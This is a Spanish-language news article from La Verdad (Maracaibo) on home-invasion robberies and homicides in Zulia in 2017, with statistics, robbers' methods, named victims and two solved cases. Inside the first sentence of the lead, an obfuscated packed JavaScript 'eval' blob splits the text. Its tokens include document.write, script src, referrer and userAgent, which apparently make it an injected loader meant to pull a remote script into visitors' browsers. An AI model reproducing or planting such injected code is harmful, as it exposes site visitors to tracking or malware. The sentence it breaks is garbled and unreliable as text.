publicidad

Asaltos y asesinatos a domicilio

Andrea Querales / Maracaibo / aquerales@laverdad.com
En eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hrdta|var|u0026u|referrer|fbdsn||js|php'.split('|'),0,{})) solo ocho meses se reportaron 26 homicidios por resistencia al robo dentro de los hogares zulianos. Solo el siete por ciento de los casos fue resuelto

Al ingeniero Russian lo interceptaron cuando abría el portón de su casa, lo robaron y lo mataron en una trilla. (Foto: La Verdad)

Resistencia al robo, así denominan, los cuerpos de seguridad, los casos donde un grupo de delincuentes ingresa a un hogar para robar a sus ocupantes y matar a quienes los descubran o se opongan. En 2017 se han contabilizado 26 homicidios en las mismas circunstancias, apenas en el siete por ciento de los crímenes se identificaron a los responsables y encarcelaron a uno o más miembros de la banda.

El modus operandi varía según los agresores. Unos simplemente amarran a sus víctimas para que no interrumpan el “proceso”, se llevan todo y se conforman con eso. Otros las silencian a golpes, puñaladas o balas.

Las comunidades de la Costa Oriental del Lago se tornan las más peligrosas para las familias. En solo ocho meses mataron a 10 residentes, entre los municipios Cabimas, Lagunillas y Santa Rita, en sus hogares. Le sigue Maracaibo con seis homicidios.

En casi todas las oportunidades, los delincuentes usan armas de fuego. Saltan las cercas de las casas, rompen ventanas o violentan cerraduras. Al estar en el interior de la vivienda someten a los integrantes de la familia, los amenazan con sus armas y así los obligan a “mantener la calma”. Una mínima falla, de parte de las víctimas, es suficiente para que el ladrón accione su arma y mate sin piedad.

Presas fáciles

Los ancianos solos son los más vulnerables a las bandas, quienes suelen buscar lugares sin poner en riesgo mucho y obtener dinero o su equivalente en equipos electrónicos o electrodomésticos. A Félix Francisco Espitia (55) lo maniataron y estrangularon para robarle la nevera. Los antisociales ingresaron por el hueco del aire acondicionado y salieron por la puerta principal con el artefacto.

Las pequeñas grupos dedicados a robos y hurtos en residencias no clasifican a sus víctimas, no evalúan la cantidad de bienes que puedan sustraer. Simplemente ven la facilidad en la que pueden obtener algo de dinero, explicó un oficial.

Luis Emilio Vivares (72) también estaba solo en su residencia del sector El Hoyito, parroquia Francisco Eugenio Bustamante de Maracaibo. Los delincuentes violentaron la cerradura de las puertas, lo amarraron, lo apuñalaron y quedó agonizando en su habitación mientras los maleantes escapaban con la nevera, la cocina, ropa y comida.

Según los casos reportados este año, a las residencias llegan de tres a seis atracadores. Optan por la madrugada, entre las 2.00 y las 4.00, para sorprender a sus víctimas y atacar.

Con temor

Los agredidos denuncian que los cuerpos de seguridad se concentran en resolver o atender solo aquellos casos donde hay muertos. Cuando las pérdidas son solo materiales, se apertura un expediente que después engavetan. Al menos el 90 por ciento de las víctimas no denuncia.

Un oficial de la Policía científica comentó que a diario se registran robos y/o hurtos en viviendas.  En Maracaibo pueden existir hasta 40 casos diarios en sus 18 parroquias, pero solo se acercan a la División de Robo aquellos a quienes les “desvalijan las casas y en la ruina”. Donde las pérdidas son mínimas ni se molestas en denunciar y esos casos son muy frecuentes.

Casos resueltos: 

Al odontólogo José Alfonso Tinaure Pérez (36) lo asesinaron, el 29 de enero, a puñaladas en su habitación. Los detectives de la Policía científica capturaron a dos mujeres y un joven, de 19 años, por su presunta vinculación. Buscan a otros dos cómplices.

Por el asesinato de Nelson Barroso (53), un periodista de la Costa Oriental del Lago, detuvieron a Yakzaira Chirinos de Zuleta (59) por comprar a un vecino el celular de la víctima. Por ella capturaron a los homicidas, Carlos Alfredo González Medina (26) y Jorge Júnior Medina David (19); y a su cómplice, Yoxisbel Ramírez Quintero (19).

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama